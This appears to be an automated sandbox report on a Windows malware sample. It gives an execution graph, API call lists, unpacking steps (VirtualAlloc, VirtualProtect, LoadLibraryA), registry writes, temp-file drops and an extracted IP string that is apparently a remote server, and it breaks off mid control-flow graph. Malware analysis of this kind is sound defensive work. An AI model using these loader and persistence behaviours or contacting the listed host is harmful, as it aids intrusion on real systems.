                      execution_graph 31740 4797cb9 31743 4797cc4 31740->31743 31744 4797cd3 31743->31744 31747 4798464 31744->31747 31749 479847f 31747->31749 31748 4798488 CreateToolhelp32Snapshot 31748->31749 31750 47984a4 Module32First 31748->31750 31749->31748 31749->31750 31751 47984b3 31750->31751 31753 4797cc3 31750->31753 31754 4798123 31751->31754 31755 479814e 31754->31755 31756 4798197 31755->31756 31757 479815f VirtualAlloc 31755->31757 31756->31756 31757->31756 31758 5f96fe 31759 5f9704 31758->31759 31760 5fd287 RegOpenKeyA 31759->31760 31761 5fd260 RegOpenKeyA 31759->31761 31763 5fd2a4 31760->31763 31761->31760 31762 5fd27d 31761->31762 31762->31760 31763->31763 31764 40a0b1 31765 40a0bd ___scrt_is_nonwritable_in_current_image 31764->31765 31792 409e11 31765->31792 31767 40a0c4 31768 40a217 31767->31768 31774 40a0ee ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 31767->31774 31819 40a58a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter CallUnexpected 31768->31819 31770 40a21e 31820 4106ab 21 API calls CallUnexpected 31770->31820 31772 40a224 31821 41066f 21 API calls CallUnexpected 31772->31821 31776 40a10d 31774->31776 31777 40a18e 31774->31777 31818 410685 39 API calls 3 library calls 31774->31818 31775 40a22c 31800 40a6a5 31777->31800 31793 409e1a 31792->31793 31822 40a2ec IsProcessorFeaturePresent 31793->31822 31795 409e26 31823 40b77d 10 API calls 2 library calls 31795->31823 31797 409e2b 31799 409e2f 31797->31799 31824 40b79c 7 API calls 2 library calls 31797->31824 31799->31767 31825 40b570 31800->31825 31803 40a194 31804 412288 31803->31804 31827 41816d 31804->31827 31806 412291 31808 40a19c 31806->31808 31833 41841d 39 API calls 31806->31833 31809 4087e0 31808->31809 31836 402460 31809->31836 31812 402460 43 API calls 31813 408807 31812->31813 31840 405a50 31813->31840 31818->31777 31819->31770 31820->31772 31821->31775 31822->31795 31823->31797 31824->31799 31826 40a6b8 GetStartupInfoW 31825->31826 31826->31803 31828 4181a8 31827->31828 31829 418176 31827->31829 31828->31806 31834 41299d 39 API calls 3 library calls 31829->31834 31831 418199 31835 417f78 49 API calls 3 library calls 31831->31835 31833->31806 31834->31831 31835->31828 31837 402483 31836->31837 31837->31837 32155 402760 31837->32155 31839 402495 31839->31812 32182 410822 GetSystemTimeAsFileTime 31840->32182 31842 405a9f 32184 4106e2 31842->32184 31845 402760 43 API calls 31846 405ada 31845->31846 31847 402760 43 API calls 31846->31847 31848 405ca0 31847->31848 32187 403ab0 31848->32187 31850 405e9f 32199 406c40 31850->32199 31852 40620c 31853 402460 43 API calls 31852->31853 31854 40621c 31853->31854 32209 402390 31854->32209 31856 406230 32217 406ee0 31856->32217 31858 40630a 31859 402460 43 API calls 31858->31859 31860 40631a 31859->31860 31861 402390 39 API calls 31860->31861 31862 40632e 31861->31862 31863 406404 31862->31863 31864 406336 31862->31864 32280 407290 53 API calls 2 library calls 31863->32280 32272 406f60 53 API calls 2 library calls 31864->32272 31867 406409 31870 402460 43 API calls 31867->31870 31868 40633b 31869 402460 43 API calls 31868->31869 31871 40634b 31869->31871 31872 406419 31870->31872 32273 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31871->32273 31876 402390 39 API calls 31872->31876 31874 406354 31875 402390 39 API calls 31874->31875 31877 40635c 31875->31877 31878 40642d 31876->31878 32274 406ff0 53 API calls 2 library calls 31877->32274 31880 4064ee 31878->31880 32281 407310 53 API calls 2 library calls 31878->32281 32289 407630 53 API calls 2 library calls 31880->32289 31881 406361 31886 402460 43 API calls 31881->31886 31884 40643a 31887 402460 43 API calls 31884->31887 31885 4064f8 31888 402460 43 API calls 31885->31888 31889 406371 31886->31889 31890 40644a 31887->31890 31891 406508 31888->31891 32275 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31889->32275 32282 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31890->32282 31899 402390 39 API calls 31891->31899 31894 40637a 31895 402390 39 API calls 31894->31895 31897 406382 31895->31897 31896 406453 31898 402390 39 API calls 31896->31898 32276 407070 53 API calls 2 library calls 31897->32276 31901 40645b 31898->31901 31902 40651c 31899->31902 32283 407390 53 API calls 2 library calls 31901->32283 31905 406603 31902->31905 32290 4076b0 53 API calls 2 library calls 31902->32290 31903 406387 31911 402460 43 API calls 31903->31911 32300 407a50 53 API calls 2 library calls 31905->32300 31907 406460 31913 402460 43 API calls 31907->31913 31909 40660d 31914 402460 43 API calls 31909->31914 31910 406529 31916 402460 43 API calls 31910->31916 31912 406397 31911->31912 31920 402390 39 API calls 31912->31920 31915 406470 31913->31915 31917 40661d 31914->31917 32284 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31915->32284 31919 406539 31916->31919 31930 402390 39 API calls 31917->31930 32291 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31919->32291 31924 4063ab 31920->31924 31921 406479 31925 402390 39 API calls 31921->31925 31923 406542 31927 402390 39 API calls 31923->31927 31928 4063cc 31924->31928 31929 4063af 31924->31929 31926 406481 31925->31926 32285 407410 53 API calls 2 library calls 31926->32285 31932 40654a 31927->31932 32278 407180 53 API calls 2 library calls 31928->32278 32277 407100 53 API calls 2 library calls 31929->32277 31935 406631 31930->31935 32292 407730 53 API calls 2 library calls 31932->32292 31940 4066b3 31935->31940 31941 406635 31935->31941 31936 406486 31948 402460 43 API calls 31936->31948 31938 4063d1 31949 402460 43 API calls 31938->31949 31939 4063b4 31947 402460 43 API calls 31939->31947 32307 407c70 53 API calls 2 library calls 31940->32307 32301 407ae0 53 API calls 2 library calls 31941->32301 31943 40654f 31952 402460 43 API calls 31943->31952 31945 4066b8 31954 402460 43 API calls 31945->31954 31946 40663a 31955 402460 43 API calls 31946->31955 31950 4063c4 31947->31950 31951 406496 31948->31951 31953 4063e1 31949->31953 32326 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31950->32326 31963 402390 39 API calls 31951->31963 31956 40655f 31952->31956 31965 402390 39 API calls 31953->31965 31958 4066c8 31954->31958 31959 40664a 31955->31959 32293 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31956->32293 31972 402390 39 API calls 31958->31972 32302 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31959->32302 31961 406875 31966 402390 39 API calls 31961->31966 31968 4064aa 31963->31968 31964 406568 31969 402390 39 API calls 31964->31969 31970 4063f5 31965->31970 31971 4066a7 31966->31971 31967 406653 31973 402390 39 API calls 31967->31973 31974 4064b8 31968->31974 31975 4064ae 31968->31975 31976 406570 31969->31976 31970->31971 32279 407210 53 API calls 2 library calls 31970->32279 32227 4017a0 31971->32227 31977 4066dc 31972->31977 31978 40665b 31973->31978 32287 407520 53 API calls 2 library calls 31974->32287 32286 4074a0 53 API calls 2 library calls 31975->32286 32294 4077b0 53 API calls 2 library calls 31976->32294 31985 4066e0 31977->31985 31986 40675e 31977->31986 32303 407b60 53 API calls 2 library calls 31978->32303 31983 4064bd 31997 402460 43 API calls 31983->31997 32308 407d00 53 API calls 2 library calls 31985->32308 32314 407e80 53 API calls 2 library calls 31986->32314 31988 406575 31996 402460 43 API calls 31988->31996 31989 4068a1 32231 4083f0 31989->32231 31992 406660 32001 402460 43 API calls 31992->32001 31994 406763 32003 402460 43 API calls 31994->32003 31995 4066e5 32004 402460 43 API calls 31995->32004 31999 406585 31996->31999 32000 4064cd 31997->32000 31998 4068aa 32008 402460 43 API calls 31998->32008 32295 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31999->32295 32014 402390 39 API calls 32000->32014 32005 406670 32001->32005 32009 406773 32003->32009 32010 4066f5 32004->32010 32304 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32005->32304 32007 40658e 32013 402390 39 API calls 32007->32013 32015 4068bd 32008->32015 32021 402390 39 API calls 32009->32021 32309 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32010->32309 32012 406679 32017 402390 39 API calls 32012->32017 32018 406596 32013->32018 32019 4064e1 32014->32019 32241 408370 32015->32241 32016 4066fe 32022 402390 39 API calls 32016->32022 32023 406681 32017->32023 32296 407830 53 API calls 2 library calls 32018->32296 32019->31971 32288 4075b0 53 API calls 2 library calls 32019->32288 32026 406787 32021->32026 32027 406706 32022->32027 32305 407bf0 53 API calls 2 library calls 32023->32305 32025 4068c8 32035 402460 43 API calls 32025->32035 32031 40678b 32026->32031 32032 4067de 32026->32032 32310 407d80 53 API calls 2 library calls 32027->32310 32029 40659b 32041 402460 43 API calls 32029->32041 32315 407f10 53 API calls 2 library calls 32031->32315 32320 4080d0 53 API calls 2 library calls 32032->32320 32034 406686 32044 402460 43 API calls 32034->32044 32039 4068db 32035->32039 32037 40670b 32047 402460 43 API calls 32037->32047 32251 4082d0 32039->32251 32040 406790 32049 402460 43 API calls 32040->32049 32045 4065ab 32041->32045 32042 4067e3 32052 402460 43 API calls 32042->32052 32048 406696 32044->32048 32057 402390 39 API calls 32045->32057 32046 4068e6 32059 402460 43 API calls 32046->32059 32050 40671b 32047->32050 32306 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32048->32306 32054 4067a0 32049->32054 32311 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32050->32311 32053 4067f3 32052->32053 32068 402390 39 API calls 32053->32068 32316 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32054->32316 32056 40669f 32062 402390 39 API calls 32056->32062 32058 4065bf 32057->32058 32063 4065c8 32058->32063 32297 4078c0 53 API calls 2 library calls 32058->32297 32064 4068f9 32059->32064 32061 406724 32066 402390 39 API calls 32061->32066 32062->31971 32298 407940 53 API calls 2 library calls 32063->32298 32261 408da0 32064->32261 32065 4067a9 32071 402390 39 API calls 32065->32071 32072 40672c 32066->32072 32073 406807 32068->32073 32076 4067b1 32071->32076 32312 407e00 53 API calls 2 library calls 32072->32312 32073->31971 32321 408150 53 API calls 2 library calls 32073->32321 32074 4065d2 32085 402460 43 API calls 32074->32085 32317 407fd0 53 API calls 2 library calls 32076->32317 32080 406731 32087 402460 43 API calls 32080->32087 32082 406926 32269 408eb0 32082->32269 32083 4067b6 32091 402460 43 API calls 32083->32091 32084 406810 32096 402460 43 API calls 32084->32096 32088 4065e2 32085->32088 32092 406741 32087->32092 32101 402390 39 API calls 32088->32101 32090 408e00 43 API calls 32093 406953 32090->32093 32094 4067c6 32091->32094 32313 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32092->32313 32097 408eb0 43 API calls 32093->32097 32318 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32094->32318 32100 406820 32096->32100 32102 406968 32097->32102 32099 40674a 32104 402390 39 API calls 32099->32104 32322 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32100->32322 32106 4065f6 32101->32106 32107 408e00 43 API calls 32102->32107 32103 4067cf 32108 402390 39 API calls 32103->32108 32104->31971 32106->31971 32299 4079d0 53 API calls 2 library calls 32106->32299 32111 406980 32107->32111 32112 4067d7 32108->32112 32109 406829 32113 402390 39 API calls 32109->32113 32114 402390 39 API calls 32111->32114 32319 408050 53 API calls 2 library calls 32112->32319 32116 406831 32113->32116 32118 40698e 32114->32118 32323 4081d0 53 API calls 2 library calls 32116->32323 32120 402390 39 API calls 32118->32120 32119 406836 32124 402460 43 API calls 32119->32124 32121 406999 32120->32121 32122 402390 39 API calls 32121->32122 32125 4069a4 32122->32125 32123 4067dc 32126 402460 43 API calls 32123->32126 32127 406846 32124->32127 32128 402390 39 API calls 32125->32128 32126->31950 32324 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32127->32324 32130 4069af 32128->32130 32132 402390 39 API calls 32130->32132 32131 40684f 32133 402390 39 API calls 32131->32133 32134 4069ba 32132->32134 32136 406857 32133->32136 32135 402390 39 API calls 32134->32135 32137 4069c5 32135->32137 32325 408250 53 API calls 2 library calls 32136->32325 32139 402390 39 API calls 32137->32139 32140 4069d0 32139->32140 32141 402390 39 API calls 32140->32141 32144 4069df 32141->32144 32142 406a3e Sleep 32142->32144 32143 402460 43 API calls 32143->32144 32144->32142 32144->32143 32145 406a47 32144->32145 32146 402390 39 API calls 32145->32146 32147 406a4f 32146->32147 32327 408c80 43 API calls 2 library calls 32147->32327 32149 406a60 32328 408c80 43 API calls 2 library calls 32149->32328 32151 406a79 32329 408c80 43 API calls 2 library calls 32151->32329 32153 406a8c 32330 404f70 130 API calls 6 library calls 32153->32330 32156 402830 32155->32156 32157 40277f 32155->32157 32173 401600 43 API calls 3 library calls 32156->32173 32158 40278b __InternalCxxFrameHandler 32157->32158 32160 4027b3 32157->32160 32163 4027f7 32157->32163 32164 4027ee 32157->32164 32158->31839 32171 401560 41 API calls 4 library calls 32160->32171 32161 402835 32174 401560 41 API calls 3 library calls 32161->32174 32170 4027cf __InternalCxxFrameHandler 32163->32170 32172 401560 41 API calls 4 library calls 32163->32172 32164->32160 32164->32161 32165 4027c6 32165->32170 32175 40cfef 32165->32175 32170->31839 32171->32165 32172->32170 32173->32161 32174->32165 32180 40cf2b 39 API calls ___std_exception_copy 32175->32180 32177 40cffe 32181 40d00c 11 API calls CallUnexpected 32177->32181 32179 40d00b 32180->32177 32181->32179 32183 41085b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 32182->32183 32183->31842 32331 4128e2 GetLastError 32184->32331 32198 403af1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32187->32198 32191 403c33 32191->31850 32192 403b8d 32194 403bd1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32192->32194 32195 403c37 32192->32195 32193 403b75 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32193->32194 32193->32195 32378 408f80 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32193->32378 32370 409a17 32194->32370 32196 40cfef 39 API calls 32195->32196 32197 403c3c 32196->32197 32198->32193 32198->32195 32377 408c80 43 API calls 2 library calls 32198->32377 32200 406c6c 32199->32200 32208 406c9e 32199->32208 32380 409cc5 6 API calls 32200->32380 32202 409a17 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 32204 406cb0 32202->32204 32203 406c76 32203->32208 32381 409fd7 42 API calls 32203->32381 32204->31852 32206 406c94 32382 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 32206->32382 32208->32202 32210 40239b 32209->32210 32211 4023b6 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32209->32211 32210->32211 32212 40cfef 39 API calls 32210->32212 32211->31856 32213 4023da 32212->32213 32214 402411 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32213->32214 32215 40cfef 39 API calls 32213->32215 32214->31856 32216 40245c 32215->32216 32218 406f0e 32217->32218 32226 406f48 32217->32226 32383 409cc5 6 API calls 32218->32383 32219 409a17 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 32221 406f5b 32219->32221 32221->31858 32222 406f18 32222->32226 32384 409fd7 42 API calls 32222->32384 32224 406f3e 32385 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 32224->32385 32226->32219 32228 4017b3 CallUnexpected 32227->32228 32386 409b8a 32228->32386 32230 4017ca CallUnexpected 32230->31989 32232 408422 32231->32232 32240 40845e 32231->32240 32413 409cc5 6 API calls 32232->32413 32234 409a17 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 32236 408470 32234->32236 32235 40842c 32235->32240 32414 409fd7 42 API calls 32235->32414 32236->31998 32238 408454 32415 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 32238->32415 32240->32234 32242 40839c 32241->32242 32250 4083ce 32241->32250 32416 409cc5 6 API calls 32242->32416 32243 409a17 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 32245 4083e0 32243->32245 32245->32025 32246 4083a6 32246->32250 32417 409fd7 42 API calls 32246->32417 32248 4083c4 32418 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 32248->32418 32250->32243 32252 408352 32251->32252 32253 40830d 32251->32253 32254 409a17 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 32252->32254 32419 409cc5 6 API calls 32253->32419 32256 408365 32254->32256 32256->32046 32257 408317 32257->32252 32420 409fd7 42 API calls 32257->32420 32259 408348 32421 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 32259->32421 32262 408db4 32261->32262 32422 409310 32262->32422 32264 40690e 32265 408e00 32264->32265 32266 408e1b 32265->32266 32268 408e2f __InternalCxxFrameHandler 32266->32268 32428 402840 43 API calls 3 library calls 32266->32428 32268->32082 32429 409130 32269->32429 32271 40693b 32271->32090 32272->31868 32273->31874 32274->31881 32275->31894 32276->31903 32277->31939 32278->31938 32279->31939 32280->31867 32281->31884 32282->31896 32283->31907 32284->31921 32285->31936 32286->31939 32287->31983 32288->31880 32289->31885 32290->31910 32291->31923 32292->31943 32293->31964 32294->31988 32295->32007 32296->32029 32297->32063 32298->32074 32299->31905 32300->31909 32301->31946 32302->31967 32303->31992 32304->32012 32305->32034 32306->32056 32307->31945 32308->31995 32309->32016 32310->32037 32311->32061 32312->32080 32313->32099 32314->31994 32315->32040 32316->32065 32317->32083 32318->32103 32319->32123 32320->32042 32321->32084 32322->32109 32323->32119 32324->32131 32325->32123 32326->31961 32327->32149 32328->32151 32329->32153 32332 4128fe 32331->32332 32333 4128f8 32331->32333 32338 412902 32332->32338 32361 4135e5 6 API calls _unexpected 32332->32361 32360 4135a6 6 API calls _unexpected 32333->32360 32336 41291a 32337 412922 32336->32337 32336->32338 32362 413294 14 API calls 2 library calls 32337->32362 32339 412987 SetLastError 32338->32339 32342 405aa8 Sleep 32339->32342 32343 412997 32339->32343 32341 41292f 32344 412937 32341->32344 32345 412948 32341->32345 32342->31845 32369 411109 39 API calls CallUnexpected 32343->32369 32363 4135e5 6 API calls _unexpected 32344->32363 32364 4135e5 6 API calls _unexpected 32345->32364 32350 412945 32366 4132f1 14 API calls __dosmaperr 32350->32366 32351 412954 32352 412958 32351->32352 32353 41296f 32351->32353 32365 4135e5 6 API calls _unexpected 32352->32365 32367 412710 14 API calls _unexpected 32353->32367 32357 41296c 32357->32339 32358 41297a 32368 4132f1 14 API calls __dosmaperr 32358->32368 32360->32332 32361->32336 32362->32341 32363->32350 32364->32351 32365->32350 32366->32357 32367->32358 32368->32357 32371 409a20 IsProcessorFeaturePresent 32370->32371 32372 409a1f 32370->32372 32374 409a67 32371->32374 32372->32191 32379 409a2a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 32374->32379 32376 409b4a 32376->32191 32377->32198 32378->32192 32379->32376 32380->32203 32381->32206 32382->32208 32383->32222 32384->32224 32385->32226 32388 409b4c 32386->32388 32389 409b6b 32388->32389 32391 409b6d 32388->32391 32400 40fb4d 32388->32400 32409 4116b2 EnterCriticalSection LeaveCriticalSection _unexpected 32388->32409 32389->32230 32392 401560 Concurrency::cancel_current_task 32391->32392 32394 409b77 32391->32394 32407 40af80 RaiseException 32392->32407 32410 40af80 RaiseException 32394->32410 32395 40157c 32408 40ad31 40 API calls 2 library calls 32395->32408 32398 40a589 32399 4015a3 32399->32230 32405 413cb9 _unexpected 32400->32405 32401 413cf7 32412 40d0dd 14 API calls __dosmaperr 32401->32412 32402 413ce2 RtlAllocateHeap 32404 413cf5 32402->32404 32402->32405 32404->32388 32405->32401 32405->32402 32411 4116b2 EnterCriticalSection LeaveCriticalSection _unexpected 32405->32411 32407->32395 32408->32399 32409->32388 32410->32398 32411->32405 32412->32404 32413->32235 32414->32238 32415->32240 32416->32246 32417->32248 32418->32250 32419->32257 32420->32259 32421->32252 32423 409398 32422->32423 32426 40932a __InternalCxxFrameHandler 32422->32426 32427 4095d0 43 API calls 4 library calls 32423->32427 32425 4093aa 32425->32264 32426->32264 32427->32425 32428->32268 32430 409173 32429->32430 32431 4092fd 32430->32431 32432 40923d 32430->32432 32439 409178 __InternalCxxFrameHandler 32430->32439 32448 401600 43 API calls 3 library calls 32431->32448 32436 409272 32432->32436 32437 409298 32432->32437 32434 409302 32449 401560 41 API calls 3 library calls 32434->32449 32436->32434 32440 40927d 32436->32440 32445 40928a __InternalCxxFrameHandler 32437->32445 32447 401560 41 API calls 4 library calls 32437->32447 32438 409283 32443 40cfef 39 API calls 32438->32443 32438->32445 32439->32271 32446 401560 41 API calls 4 library calls 32440->32446 32444 40930c 32443->32444 32445->32271 32446->32438 32447->32445 32448->32434 32449->32438 32450 5f96bd LoadLibraryA 32451 5fb40a 32450->32451 32452 494003c 32453 4940049 32452->32453 32454 494004c 32452->32454 32468 4940e0f SetErrorMode SetErrorMode 32454->32468 32459 4940265 32460 49402ce VirtualProtect 32459->32460 32462 494030b 32460->32462 32461 4940439 VirtualFree 32466 49405f4 LoadLibraryA 32461->32466 32467 49404be 32461->32467 32462->32461 32463 49404e3 LoadLibraryA 32463->32467 32465 49408c7 32466->32465 32467->32463 32467->32466 32469 4940223 32468->32469 32470 4940d90 32469->32470 32471 4940dad 32470->32471 32472 4940dbb GetPEB 32471->32472 32473 4940238 VirtualAlloc 32471->32473 32472->32473 32473->32459

                      Executed Functions

                      Function 00403D40 Relevance: 57.8, APIs: 25, Strings: 7, Instructions: 1839sleepcomCOMMON
                      Download Yara Rule
                      APIs
                      • GetTempPathA.KERNEL32(00000104,?,79D989F6,74DF0F00,00000000), ref: 00403DAA
                      • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403F39
                      • Sleep.KERNEL32(000003E8), ref: 00403F42
                      • __Init_thread_footer.LIBCMT ref: 00404517
                      • __Init_thread_footer.LIBCMT ref: 004046DD
                      • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 004048E7
                      • __Init_thread_footer.LIBCMT ref: 00404975
                      • __Init_thread_footer.LIBCMT ref: 00404BDE
                      • CoInitialize.OLE32(00000000), ref: 00404C5F
                      • CoCreateInstance.OLE32(0041F290,00000000,00000001,0041F260,?,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404C7A
                      • __Init_thread_footer.LIBCMT ref: 004050DD
                      • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                      • __Init_thread_footer.LIBCMT ref: 004053EB
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404CE8
                        • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,79D989F6), ref: 00410837
                        • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                      • CoUninitialize.OLE32(?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71,?,?,?,?,00000000,0042D9A0), ref: 00404D21
                      • CoUninitialize.OLE32(?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404DE4
                      • CoUninitialize.OLE32(?,?,?,?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404E65
                      • __Init_thread_footer.LIBCMT ref: 00404046
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        • Part of subcall function 00402220: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402256
                        • Part of subcall function 00402220: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402277
                        • Part of subcall function 00402220: CloseHandle.KERNEL32(00000000), ref: 0040227E
                      • __Init_thread_footer.LIBCMT ref: 00404222
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Init_thread_footer$CriticalSection$CreateFileUninitialize$EnterLeavePathSleepTime$ByteCharCloseConditionDirectoryFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@VariableWakeWideWrite__ehfuncinfo$??2@
                      • String ID: 185.156.72.65$O@K\$SUB=$Y@BA$ZK\.$get$rmBK
                      • API String ID: 995133137-3578497191
                      • Opcode ID: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                      • Instruction ID: 6a8ba5f9be4b72ae1469cca8882757b6bc7ac7481bdf7cf44a4378d84f27710c
                      • Opcode Fuzzy Hash: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                      • Instruction Fuzzy Hash: 44F2DFB0E042549BDB24DF24DC48B9EBBB0EF45304F5442E9E5097B2D2DB78AA84CF59
                      Function 00404F70 Relevance: 45.4, APIs: 16, Strings: 9, Instructions: 1645sleepregistryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 498 404f70-405085 call 410822 call 4106e2 call 40b570 call 409b8a call 40b570 509 405090-40509b 498->509 510 4050e5-4050ec 509->510 511 40509d-4050b1 call 409cc5 509->511 512 40512d-405150 510->512 513 4050ee-405128 510->513 511->510 518 4050b3-4050e2 call 409fd7 call 409c7b 511->518 515 405153-405158 512->515 513->512 515->515 517 40515a-4051fc call 402760 call 409310 515->517 527 405211-40522c call 401e50 517->527 528 4051fe-405207 call 409a25 517->528 518->510 533 40525d-405285 527->533 534 40522e-40523d 527->534 528->527 537 4052b6-4052b8 533->537 538 405287-405296 533->538 535 405253-40525a call 409b7c 534->535 536 40523f-40524d 534->536 535->533 536->535 539 4058dd-405982 call 40cfef RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 536->539 543 4052f0-4052fb Sleep 537->543 544 4052ba-4052cd 537->544 541 405298-4052a6 538->541 542 4052ac-4052b3 call 409b7c 538->542 555 4059b0-4059c8 539->555 556 405984-405990 539->556 541->539 541->542 542->537 543->509 548 4052d0-4052d5 544->548 548->548 551 4052d7-4052e9 call 4024a0 548->551 551->543 557 4052eb-4052ee 551->557 560 4059f2-405a0a 555->560 561 4059ca-4059d6 555->561 558 405992-4059a0 556->558 559 4059a6-4059ad call 409b7c 556->559 557->543 562 405300-405389 call 40b570 call 409b8a call 40b570 557->562 558->559 563 405a42-405a47 call 40cfef 558->563 559->555 567 405a34-405a41 call 409a17 560->567 568 405a0c-405a18 560->568 565 4059e8-4059ef call 409b7c 561->565 566 4059d8-4059e6 561->566 586 405390-4053a2 562->586 565->560 566->563 566->565 574 405a2a-405a31 call 409b7c 568->574 575 405a1a-405a28 568->575 574->567 575->563 575->574 587 4053f3-4053fa 586->587 588 4053a4-4053b8 call 409cc5 586->588 590 4053fc-4053fe 587->590 591 40540d-405430 587->591 588->587 596 4053ba-4053f0 call 409fd7 call 409c7b 588->596 594 405400-40540b 590->594 592 405433-405438 591->592 592->592 595 40543a-4054dc call 402760 call 409310 592->595 594->591 594->594 605 4054f1-40550c call 401e50 595->605 606 4054de-4054e7 call 409a25 595->606 596->587 611 40553d-405565 605->611 612 40550e-40551d 605->612 606->605 613 405596-405598 611->613 614 405567-405576 611->614 615 405533-40553a call 409b7c 612->615 616 40551f-40552d 612->616 619 405693-40569c 613->619 620 40559e-4055a5 613->620 617 405578-405586 614->617 618 40558c-405593 call 409b7c 614->618 615->611 616->539 616->615 617->539 617->618 618->613 619->586 624 4056a2 619->624 620->619 625 4055ab-4055b3 620->625 627 405775-4057d9 call 409a25 * 3 CoUninitialize call 409a25 * 3 CoUninitialize 624->627 628 4055b9-4055bc 625->628 629 40568d 625->629 657 405807-40580d 627->657 658 4057db-4057e7 627->658 628->629 631 4055c2-4055ea call 40fb4d 628->631 629->619 637 4055f0-405602 call 40aff0 631->637 638 4055ec-4055ee 631->638 641 405605-40565c call 40fb4d call 408c80 call 4035d0 call 402ee0 637->641 638->641 641->629 664 40565e-405669 call 403430 641->664 662 40583b-405853 657->662 663 40580f-40581b 657->663 660 4057e9-4057f7 658->660 661 4057fd-405804 call 409b7c 658->661 660->539 660->661 661->657 665 405855-405861 662->665 666 40587d-405895 662->666 668 405831-405838 call 409b7c 663->668 669 40581d-40582b 663->669 664->629 683 40566b-405679 call 403430 664->683 671 405873-40587a call 